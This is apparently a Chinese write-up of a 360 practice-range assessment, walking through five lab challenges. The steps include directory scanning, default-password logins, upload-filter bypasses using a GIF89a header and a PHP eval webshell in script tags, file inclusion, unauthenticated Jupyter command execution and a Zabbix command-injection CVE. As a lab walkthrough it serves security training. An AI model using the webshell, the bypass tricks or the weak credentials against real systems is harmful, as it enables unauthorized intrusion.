記一次360靶場考核
第一輪理論題
百度搜答案即可= =
第二輪實戰考核
第一題 拆舊有限公司
打開環境是一個公司官網
隨便點了點沒發現什么東西
別慌
掃一下目錄,看看能不能掃到后台或者敏感路徑之類的突破口
果然,直接掃到了后台
嘗試了一下弱密碼admin/admin888
成功登錄
發現是一個備份文件后台
通過抓包修改備份文件內容和文件名
這里嘗試上傳一句話
成功連接shell
第二題 圖書館公共網絡存儲網盤
打開環境是一個登錄頁面
發現它有一個”非注冊用戶上傳文件“的功能
經過測試發現檢測了文件頭
,
所以這里用GIF89a
來繞過文件頭檢測,
再次上傳一句話時,發現還過濾了<?
,
決定用\<script\>
標簽php一句話木馬來繞過<?
的過濾。
<script language="php">
@eval($_POST['shell']);
</script>
但怎么都不解析PHP
沒有思路的時候,重新看了一遍上傳功能
!!!!!突然發現
URL中存在文件包含
成功拿下
第三題
上傳繞過方法與第二題一致就不過多敘述
第四題 WEB應用管理
jupyter的未授權訪問遠程命令執行
漏洞編號:SSV-99338
漏洞描述:管理員未為Jupyter Notebook配置密碼,將導致未授權訪問漏洞
,游客可在其中創建一個console
並執行任意Python代碼和命令
。
執行系統命令
ovyan@1904042cf343:~$vyan@1904042cf343:~$ ls ../../
bin boot dev etc home KEY_10b6e8259961.txt lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
jovyan@1904042cf343:~$ cat /KEY_10b6e8259961.txt
mozhe7addd24523b82e0e371b5f7c7dg
第五題 智谷運維管理系統
漏洞編號:CVE-2020-11800
Zabbix Server的trapper命令處理,
存在命令注入漏洞
,可導致遠程代碼執行
。
弱口令登錄后台admin/Zabbix
拿下
附: